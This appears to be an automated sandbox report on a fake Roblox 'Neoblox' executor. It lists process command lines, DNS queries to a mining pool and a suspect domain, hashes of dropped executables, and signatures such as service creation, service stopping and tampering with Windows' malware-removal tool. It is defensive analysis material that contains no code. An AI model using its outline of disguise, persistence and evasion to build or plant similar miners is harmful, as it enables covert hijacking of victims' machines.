C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/NeobloxExecutor/neoblox/issues

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff9f0646f8,0x7fff9f064708,0x7fff9f064718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3976 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3976 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 neoblox.is-from.space udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 github.com udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 pool.hashvault.pro udp

Files

C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe

MD5 fa532255379e9d0135b519e96b62f6ca
SHA1 099c0338db1a0aedf4e050ad0be7380034cf149e
SHA256 3335ee3c5d3f45de09712165a407755a051e5a2c812fa2a87d81431b5b3c583a
SHA512 fd2176004c7235bf215c2c62064559c023e47aa5def987c8344765d5f67a1dfb74e0bfb0ecd044bb1be247b3db4204a8c8bd2cbe622ba99bd81f0a6921c2bd4e

memory/4452-11-0x0000000004700000-0x0000000004736000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe

MD5 07c00a89b882adab59d0b2e6eeac3516
SHA1 05ef4e1c48a3d081bb535b979e0e88a242cfdd48
SHA256 719f686324040140c4d8b03c5a35c4036b2a5535f1ee5aaf50ad79f2367126e2
SHA512 6a98ce5df9a7fbeb910bbea419b22794b7b4cde06f19222e55c1a21642a1e7b0036ae95022006de7ce8eabca78773ec07b01ee6e9d6ef6a6d7b62aebf5e15401

memory/4452-23-0x0000000004D70000-0x0000000005398000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Roblox.exe

MD5 fa9383ead577a1004af69c84708d66e0
SHA1 db0472630e63ae1819fdadbef7def6bbeb0c485e
SHA256 e8e0c6615894c8eecdb536ea891f042ca35e44afac88beddb9e9a4c79bb3c293
SHA512 6f67a6e52910c578e8ec953bfc1fb17d49b7fc1bc0337a5e3fe41e4572f0e2bdeaeb45b2be44ceda471ba64e8381cd08bdca1faec7dc2cdc67c6534e007ffd92

memory/1076-38-0x00000000009D0000-0x0000000000A26000-memory.dmp

memory/1076-41-0x0000000002B90000-0x0000000002B9A000-memory.dmp

memory/3236-43-0x0000000005740000-0x00000000057A6000-memory.dmp

memory/3236-44-0x00000000057B0000-0x0000000005816000-memory.dmp

memory/3236-42-0x00000000056A0000-0x00000000056C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_munw2ufq.4c2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3236-59-0x0000000006140000-0x0000000006494000-memory.dmp

memory/3236-67-0x0000000006770000-0x00000000067BC000-memory.dmp

memory/3236-66-0x0000000006750000-0x000000000676E000-memory.dmp

memory/3236-68-0x0000000006D00000-0x0000000006D32000-memory.dmp

memory/3236-70-0x0000000074F50000-0x0000000074F9C000-memory.dmp

memory/4452-69-0x0000000074F50000-0x0000000074F9C000-memory.dmp

memory/3236-88-0x0000000006D60000-0x0000000006D7E000-memory.dmp

memory/3236-90-0x0000000007760000-0x0000000007803000-memory.dmp

memory/3236-91-0x00000000080B0000-0x000000000872A000-memory.dmp

memory/3236-92-0x0000000007A70000-0x0000000007A8A000-memory.dmp

memory/4452-93-0x0000000007010000-0x000000000701A000-memory.dmp

memory/3236-94-0x0000000007D00000-0x0000000007D96000-memory.dmp

memory/3236-95-0x0000000007C70000-0x0000000007C81000-memory.dmp

memory/4452-96-0x00000000071D0000-0x00000000071DE000-memory.dmp

memory/3236-97-0x0000000007CC0000-0x0000000007CD4000-memory.dmp

memory/3236-98-0x0000000007DA0000-0x0000000007DBA000-memory.dmp

memory/4452-99-0x00000000072B0000-0x00000000072B8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 423629ec0277e7b99545147f21d5019f
SHA1 5f17659cec900cc192fa6677f596ac32b08e2eb1
SHA256 8df3a3794edf298f789c77ec2012ea1de041826cd4a084f227b7e6d4217c98a3
SHA512 e9e287c7e81f577cc9dae3dc94455b8ce65ec399969e1a7296748c4f0e83ca1f9cb3013d7fa04a07cf5b3c713b8a42181943810eaa1380376be954d6fd443558

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/3264-105-0x00007FF7F53C0000-0x00007FF7F8C73000-memory.dmp

memory/5016-115-0x0000022FB0580000-0x0000022FB05A2000-memory.dmp

memory/2036-122-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2036-124-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2036-121-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2036-125-0x00007FFFBC790000-0x00007FFFBC985000-memory.dmp

memory/2036-126-0x00007FFFBAA50000-0x00007FFFBAB0E000-memory.dmp

memory/2036-120-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2036-119-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1020-142-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/952-145-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/748-151-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/1088-164-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/892-175-0x000001DD98390000-0x000001DD983BB000-memory.dmp

memory/1156-180-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/1156-179-0x00000240FA280000-0x00000240FA2AB000-memory.dmp

memory/1080-173-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/1080-172-0x000002444EAE0000-0x000002444EB0B000-memory.dmp

memory/1100-170-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/1100-169-0x000001831B160000-0x000001831B18B000-memory.dmp

memory/1088-163-0x000002BC29C60000-0x000002BC29C8B000-memory.dmp

memory/748-150-0x000001DFAFD40000-0x000001DFAFD6B000-memory.dmp

memory/1020-141-0x0000014AE74A0000-0x0000014AE74CB000-memory.dmp

memory/952-144-0x0000016ECA7E0000-0x0000016ECA80B000-memory.dmp

memory/664-137-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/664-136-0x0000021692830000-0x000002169285B000-memory.dmp

memory/616-134-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/616-133-0x0000024BE2EE0000-0x0000024BE2F0B000-memory.dmp

memory/616-131-0x0000024BE2E50000-0x0000024BE2E74000-memory.dmp

memory/2036-128-0x0000000140000000-0x000000014002B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/5116-425-0x0000019D527A0000-0x0000019D527BC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b80cd7a712469a4c45fec564313d9eb
SHA1 6125c01bc10d204ca36ad1110afe714678655f2d
SHA256 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512 ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

memory/5116-427-0x0000019D527C0000-0x0000019D52875000-memory.dmp

memory/5116-428-0x0000019D52880000-0x0000019D5288A000-memory.dmp

memory/5116-433-0x0000019D529F0000-0x0000019D52A0C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8cb3e9459807e35f02130fad3f9860d
SHA1 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

memory/5116-455-0x0000019D529D0000-0x0000019D529DA000-memory.dmp

memory/5116-456-0x0000019D52A30000-0x0000019D52A4A000-memory.dmp

memory/5116-457-0x0000019D529E0000-0x0000019D529E8000-memory.dmp

memory/5116-458-0x0000019D52A10000-0x0000019D52A16000-memory.dmp

memory/5116-459-0x0000019D52A20000-0x0000019D52A2A000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

memory/4696-747-0x000001FDD9FF0000-0x000001FDDA0A5000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a62448b7c56d7bd585bd0c3ea436ff97
SHA1 1e9fa0b1d1adaaa5d5d31e2ea8ec7b53c249ee4c
SHA256 9e50f53f856afadf15ae4e3685e35c2d23962bc6fdc03ed65ff27b06218a6784
SHA512 ad85bb14f6493c90db13c4a4f87c46c4ff954d535ffffdf0b9222545e135f7abc435c74033e54162230110439b8b55526922d173dd497977ce01ff754881a5ff

memory/3192-917-0x0000015E1D690000-0x0000015E1D745000-memory.dmp

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 439b5e04ca18c7fb02cf406e6eb24167
SHA1 e0c5bb6216903934726e3570b7d63295b9d28987
SHA256 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654
SHA512 d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

\??\pipe\LOCAL\crashpad_2932_UMJESZLWBLUAEFQL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a8e767fd33edd97d306efb6905f93252
SHA1 a6f80ace2b57599f64b0ae3c7381f34e9456f9d3
SHA256 c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb
SHA512 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4a2854a78e226c6318cc624c76fca9ed
SHA1 68b93c338081f2c91b787d145a8ab9f831a89d76
SHA256 ce17d49912cece820a5d3a568f89d8f132e52e07c0a0fff37955a920bd2072d4
SHA512 683913a327740ffd18f270b8796072e1cf6ef33aa96254db5255220e4baa25e38bc0ce721765e72c86c42e7ce9153e359973e1981057a7c49fe8b697fb7fd194

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5b579f6015d0c4959efe5f6867e885b0
SHA1 fef733f5df2d96bd756c8f4acf7ecfebc790064f
SHA256 c045645d9aacaf2001e1c072811dacbfcacef1a87e41df205f85860ff3a20f39
SHA512 aad798a7c16d9a3a01471d767cb380190f869393f9cc359f711bedb4538793db6733303d52e05e7c9dfe25fb94bb39dd332deb7d5b597028e8a032df031697c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5582e84313f913ac577a0a161c30a31e
SHA1 feae74453b9b6581d9d8aea7309a25e3a1c57a78
SHA256 283ce8a9e4d966295de6de9a05a95970b98f3600b4d33493ab31257464fefd5b
SHA512 1dcd50944e136ebda6df947493f2dc8e4d74097f8bff78b5ab86dacac3a973f1411d18eed9dd7cf31a0aed3ddb3c08b1d0ed42b0a3fb7bacf121bfc48be72dc3

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 17:51

Reported

2024-06-14 17:54

Platform

win11-20240611-en

Max time kernel

135s

Max time network

135s

Command Line

winlogon.exe

Signatures

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 4896 created 2868 N/A C:\Windows\system32\WerFault.exe C:\Windows\System32\pcaui.exe

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
